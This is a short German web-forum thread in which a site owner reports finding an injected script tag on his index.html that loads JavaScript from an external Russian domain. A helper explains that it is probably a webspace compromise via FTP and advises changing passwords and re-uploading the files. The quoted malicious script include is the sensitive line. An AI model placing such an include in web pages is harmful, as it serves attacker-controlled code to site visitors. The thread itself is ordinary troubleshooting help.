xss

[boomer]

neulich habe ich diesen code auf meiner index.html datei gefunden.
<script type="text/javascript" src="http://cutboss.ru/Finder.js"></script>
<!--44c559a00987c84148e293db733fd687-->

wie kommt dieser rauf?
ich habe auf meiner website nur eine php datei...die kontakt.php.. hier versende ich ja nur eine email

wie kann derjenige dann auf meine index.html seite zugreifen???

[Settler]

Nicht soviele nützliche Informationen zu deinem Problem auf einmal, man könnte dir ja helfen ...

[boomer]

welchen quellcode wollt ihr sehen?

ist es möglich eine xss attacke auf html seiten zu verwenden?

[threadi]

Eher unwahrscheinlich, denn dazu muss man die HTML-Dateien bearbeiten können was wiederum Dateisystemzugriff erfordert.

Solche Codes werden manchmal von Hoster der Webseite automatisiert eingetragen. Da er jedoch eine russische Domain enthält würde ich eher darauf tippen, dass es sich um einen illegalen Zugriff auf deinen Webspace handelte, vermutlich per FTP. Ich würde dir raten sofort alle Passwörter zu ändern und die Dateien nochmal neu hochzuladen.